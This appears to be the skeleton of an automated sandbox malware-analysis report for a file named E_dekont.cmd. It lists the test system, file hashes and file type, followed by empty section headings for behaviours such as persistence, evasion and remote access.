System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	79c1ba6106f6cb367fc280abae110506
SHA1:	2656bbcf91b0dd2261a5b9fb44e41539931243ac
SHA256:	09ed171d42a56e9db61a78259695d8d3b2e623348ed2d24dc58745e134997df6
Filetype:	Microsoft Cabinet Archive (8008/1) 99.91%

Windows Analysis Report E_dekont.cmd

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
E_dekont.cmd

Malware Threat Intel
Provided by